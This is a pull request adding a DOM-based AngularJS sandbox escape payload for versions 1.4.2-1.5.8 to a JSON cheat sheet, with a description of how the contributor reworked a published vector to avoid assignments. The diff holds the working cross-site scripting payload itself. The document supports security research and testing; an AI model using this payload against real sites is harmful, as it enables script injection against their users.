### PR TITLE
Added DOM AngularJS sandbox escape (1.4.2-1.5.8)

### DIFF
--- a/json/angularjs.json
+++ b/json/angularjs.json
@@ -360,6 +360,26 @@
         "csp": false
     },
     {
+        "versionRange": "1.4.2-1.5.8",
+        "version": "1.5.0",
+        "authors": [
+            {
+                "name": "Gareth Heyes",
+                "company": "PortSwigger",
+                "twitterUrl": "https:\/\/twitter.com\/garethheyes"
+            },
+            {
+                "name": "Daniel Kachakil",
+                "company": "Anvil Ventures",
+                "twitterUrl": "https:\/\/twitter.com\/kachakil"
+            }
+        ],
+        "vector": "{y:''.constructor.prototype}.y.charAt=[].join;[1]|orderBy:'x=alert(1)'",
+        "hash": "",
+        "type": "dom",
+        "csp": false
+    },
+    {
         "versionRange": ">=1.6.0",
         "version": "1.6.0",
         "authors": [


### PR DESCRIPTION
The original payload was listed in your own [research](https://portswigger.net/research/dom-based-angularjs-sandbox-escapes), but it was missing from this cheat sheet.

I slightly adapted it, not only to reduce its size, but mostly to avoid using assignments and make it useful for other DOM-based scenarios where there is no target object, such as calls to `$interpolate` (through custom filters, for instance), where the attacker has control over the input, but there is no additional context, and no properties can be added. In such cases, the original exploit would fail with this error:

```
Cannot set property 'x' of undefined
```

However, this one will work, as there is no assignment at all.